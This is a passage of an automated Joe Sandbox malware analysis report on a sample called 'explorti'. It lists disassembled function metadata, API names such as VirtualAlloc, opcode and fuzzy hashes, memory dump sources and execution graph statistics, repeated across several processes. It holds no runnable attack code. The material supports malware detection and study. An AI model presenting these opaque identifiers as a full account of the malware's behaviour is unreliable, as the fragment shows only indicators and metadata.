                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 3d8ba4261060e5976f9b3247cdf13f965cb024b032b9f024f22a5fc7d16ee2ff
                        • Instruction ID: 65aaec85245783bde3db217e3eb377f2013963a96ce3b4f15b8fc5997d5812db
                        • Opcode Fuzzy Hash: 3d8ba4261060e5976f9b3247cdf13f965cb024b032b9f024f22a5fc7d16ee2ff
                        • Instruction Fuzzy Hash: 1C51B738A002889BCF10DFA8D881AAEBBB6FF97314F148155E9159B352D776DE05CB90
                        Function 001A70A9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: _wcsrchr
                        • String ID: .bat$.cmd$.com$.exe
                        • API String ID: 1752292252-4019086052
                        • Opcode ID: 35109140d5c9726fdf560cfbc98ebd187ca1a66e5857e0a66abb4254e4c4d5d6
                        • Instruction ID: 2b0191567991aff356ae183a1d2ac41da13177d4c350fce15fabb4bcd7a19918
                        • Opcode Fuzzy Hash: 35109140d5c9726fdf560cfbc98ebd187ca1a66e5857e0a66abb4254e4c4d5d6
                        • Instruction Fuzzy Hash: 7501C43FB0C61525661460199C02A7B57D88FA3BB8B2A002EF944F72C3EF55DD0251E4
                        Function 00172DC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Mtx_unlock$Cnd_broadcast
                        • String ID:
                        • API String ID: 32384418-0
                        • Opcode ID: 4426ca8b6c3895c0fe31c3c610da5d88162e26e837febbde80893cecd39bda02
                        • Instruction ID: 887f31e933d6ad66d5d22b430cabda3a82d6439cdce8887fb4a376b6c8ea46be
                        • Opcode Fuzzy Hash: 4426ca8b6c3895c0fe31c3c610da5d88162e26e837febbde80893cecd39bda02
                        • Instruction Fuzzy Hash: 7CA1D270A013159FDB11EF64C944BAAB7F8FF15314F148269E819D7681EB34EA05CBE1
                        Function 001AC990 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                        • Instruction ID: b8972d994b78cb3f1fdc73d4e946896f447d3c4f69f41eaef64b7f94f8bd6fa2
                        • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                        • Instruction Fuzzy Hash: 46B1253A9002859FDB15CF28C8927FEBBE5EF56350F15816AE845EB341E7359D01CBA0
                        Function 0018BA72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xtime_diff_to_millis2_xtime_get
                        • String ID:
                        • API String ID: 531285432-0
                        • Opcode ID: d88ccbdf63e969e47b8a8c43fee355435b76ee583e374265c39d8a21918af193
                        • Instruction ID: 88948cdcc01ab814bf6c042f4c1c8ebde0cbd116da8cdc82430d501981955964
                        • Opcode Fuzzy Hash: d88ccbdf63e969e47b8a8c43fee355435b76ee583e374265c39d8a21918af193
                        • Instruction Fuzzy Hash: 61212C71A00119AFDF05EFA8DC819BEBBB8EF58710F500055F901A7251DB30AE019FE0

                        Execution Graph

                        Execution Coverage:0.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:2
                        Total number of Limit Nodes:0
                        execution_graph 512 1deeef VirtualAlloc 513 1def14 512->513

                        Executed Functions

                        Function 001DF223 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 1df223-1df271 VirtualAlloc 1 1df320-1df32b 0->1
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 001DF249
                        Memory Dump Source
                        • Source File: 00000002.00000001.1699526597.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_1_1db000_explorti.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 3bdc84dfc7c00c5625f01b428227567c371bff757a35d821161ea53f9f9bdf98
                        • Instruction ID: 5ba6d290ee817c6f00bef9b7d2618a996453bea24eff695bf970f4e64d84a1df
                        • Opcode Fuzzy Hash: 3bdc84dfc7c00c5625f01b428227567c371bff757a35d821161ea53f9f9bdf98
                        • Instruction Fuzzy Hash: A4F0DFB400C640EFE7052F19C850A7EBBF9EF95710F16082EA9C58B361E6764CA0CF56
                        Function 001DEEEF Relevance: 1.3, APIs: 1, Instructions: 25memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2 1deeef-1def08 VirtualAlloc 3 1def14-1df400 2->3
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 001DEF02
                        Memory Dump Source
                        • Source File: 00000002.00000001.1699526597.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_1_1db000_explorti.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: d8cf285540adf3d704d3e8bedb9cdff6bbb8e91b08e16b49ad89d83927a85120
                        • Instruction ID: 72c295a9c4ffc71a3f6126b49f269249890277d73c38e17211ce1daeffc70972
                        • Opcode Fuzzy Hash: d8cf285540adf3d704d3e8bedb9cdff6bbb8e91b08e16b49ad89d83927a85120
                        • Instruction Fuzzy Hash: 4DF05AB144CA499FD709AF6988892AEBBE0FF05711F13092EE8D286A90D7305890CA56

                        Execution Graph

                        Execution Coverage:0.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:2
                        Total number of Limit Nodes:0
                        execution_graph 515 1deeef VirtualAlloc 516 1def14 515->516

                        Executed Functions

                        Function 001DF223 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 1df223-1df271 VirtualAlloc 1 1df320-1df32b 0->1
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 001DF249
                        Memory Dump Source
                        • Source File: 00000009.00000001.2899326700.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_1_1db000_explorti.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 3bdc84dfc7c00c5625f01b428227567c371bff757a35d821161ea53f9f9bdf98
                        • Instruction ID: 5ba6d290ee817c6f00bef9b7d2618a996453bea24eff695bf970f4e64d84a1df
                        • Opcode Fuzzy Hash: 3bdc84dfc7c00c5625f01b428227567c371bff757a35d821161ea53f9f9bdf98
                        • Instruction Fuzzy Hash: A4F0DFB400C640EFE7052F19C850A7EBBF9EF95710F16082EA9C58B361E6764CA0CF56
                        Function 001DEEEF Relevance: 1.3, APIs: 1, Instructions: 25memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2 1deeef-1def08 VirtualAlloc 3 1def14-1df400 2->3
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 001DEF02
                        Memory Dump Source
                        • Source File: 00000009.00000001.2899326700.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_1_1db000_explorti.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: d8cf285540adf3d704d3e8bedb9cdff6bbb8e91b08e16b49ad89d83927a85120
                        • Instruction ID: 72c295a9c4ffc71a3f6126b49f269249890277d73c38e17211ce1daeffc70972
                        • Opcode Fuzzy Hash: d8cf285540adf3d704d3e8bedb9cdff6bbb8e91b08e16b49ad89d83927a85120
                        • Instruction Fuzzy Hash: 4DF05AB144CA499FD709AF6988892AEBBE0FF05711F13092EE8D286A90D7305890CA56

                        Execution Graph

                        Execution Coverage:0.9%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:2
                        Total number of Limit Nodes:0
                        execution_graph 516 1deeef VirtualAlloc 517 1def14 516->517

                        Executed Functions

                        Function 001DF223 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 1df223-1df271 VirtualAlloc 1 1df320-1df32b 0->1
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 001DF249
                        Memory Dump Source
                        • Source File: 0000000B.00000001.4099664555.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_1_1db000_explorti.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 3bdc84dfc7c00c5625f01b428227567c371bff757a35d821161ea53f9f9bdf98
                        • Instruction ID: 5ba6d290ee817c6f00bef9b7d2618a996453bea24eff695bf970f4e64d84a1df
                        • Opcode Fuzzy Hash: 3bdc84dfc7c00c5625f01b428227567c371bff757a35d821161ea53f9f9bdf98
                        • Instruction Fuzzy Hash: A4F0DFB400C640EFE7052F19C850A7EBBF9EF95710F16082EA9C58B361E6764CA0CF56
                        Function 001DEEEF Relevance: 1.3, APIs: 1, Instructions: 25memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2 1deeef-1def08 VirtualAlloc 3 1def14-1df400 2->3
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 001DEF02
                        Memory Dump Source
                        • Source File: 0000000B.00000001.4099664555.00000000001DB000.00000040.00000001.01000000.00000007.sdmp, Offset: 001DB000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_1_1db000_explorti.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: d8cf285540adf3d704d3e8bedb9cdff6bbb8e91b08e16b49ad89d83927a85120
                        • Instruction ID: 72c295a9c4ffc71a3f6126b49f269249890277d73c38e17211ce1daeffc70972
                        • Opcode Fuzzy Hash: d8cf285540adf3d704d3e8bedb9cdff6bbb8e91b08e16b49ad89d83927a85120
                        • Instruction Fuzzy Hash: 4DF05AB144CA499FD709AF6988892AEBBE0FF05711F13092EE8D286A90D7305890CA56